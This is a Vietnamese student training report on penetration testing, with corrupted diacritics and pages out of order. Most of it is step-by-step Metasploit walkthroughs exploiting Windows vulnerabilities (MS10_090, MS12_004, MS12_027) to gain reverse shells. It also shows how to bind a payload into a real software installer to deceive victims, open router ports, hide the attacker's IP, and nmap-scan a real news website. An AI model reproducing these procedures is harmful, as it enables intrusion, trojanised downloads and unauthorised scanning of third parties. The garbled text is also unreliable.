Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
